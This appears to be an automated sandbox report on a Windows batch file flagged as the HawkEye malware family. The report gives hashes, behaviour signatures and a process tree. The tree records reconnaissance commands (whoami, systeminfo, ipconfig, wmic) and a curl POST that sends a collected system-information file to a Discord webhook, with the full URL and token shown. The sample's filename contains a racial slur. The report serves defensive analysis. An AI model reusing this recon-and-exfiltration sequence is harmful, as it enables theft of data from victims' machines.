Analysis

  • max time kernel
    15s
  • max time network
    17s
  • platform
    windows10-ltsc_2021_x64
  • resource
    win10ltsc2021-20250314-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system
  • submitted
    01/04/2025, 14:40

General

  • Target

    niggagimeinfo.bat

  • Size

    732B

  • MD5

    a874910a487c124be0f303e1c626091c

  • SHA1

    1f160820d42a658baf7b4fa3759847d2acdef6a0

  • SHA256

    c6c4ab9000f281ecd77ca3a6bc7d1c9844c5d28bb19a8ee416a8c6cc1e597987

  • SHA512

    df0381058099400a48f1e63f22141d9a0f385a6ab427df4ecc55331f85347a6ebb0d4eecca3491a39496bc91098ef3efffce941f3e03ced308505da565ff9041

Malware Config

Signatures

  • HawkEye

    HawkEye is a malware kit that has seen continuous development since at least 2013.

  • Hawkeye family
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • cURL User-Agent 1 IoCs

    Uses User-Agent string associated with cURL utility.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\niggagimeinfo.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5536
    • C:\Windows\system32\HOSTNAME.EXE
      hostname
      2⤵
        PID:1564
      • C:\Windows\system32\whoami.exe
        whoami
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2764
      • C:\Windows\system32\systeminfo.exe
        systeminfo
        2⤵
        • Gathers system information
        PID:3252
      • C:\Windows\system32\findstr.exe
        findstr /B /C:"OS Name" /C:"OS Version"
        2⤵
          PID:460
        • C:\Windows\system32\ipconfig.exe
          ipconfig
          2⤵
          • Gathers network information
          PID:3404
        • C:\Windows\system32\findstr.exe
          findstr IPv6
          2⤵
            PID:5252
          • C:\Windows\system32\ipconfig.exe
            ipconfig
            2⤵
            • Gathers network information
            PID:5724
          • C:\Windows\system32\findstr.exe
            findstr IPv4
            2⤵
              PID:1464
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic logicaldisk get caption, freespace, size
              2⤵
              • Collects information from the system
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4504
            • C:\Windows\system32\curl.exe
              curl -X POST https://discord.com/api/webhooks/1356637948279394315/wBsP0ldZy-OklbkGSc8jSiZ8Y16MimqHEj7Ln0Ff1INRHzRS024TSAFclzmg8-DVJw_b -H "Content-Type: application/json" -d "{\"content\": \"```\n$(type "C:\Users\Admin\AppData\Local\Temp\sysinfo.txt")\n```\"}"
              2⤵
                PID:5608

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads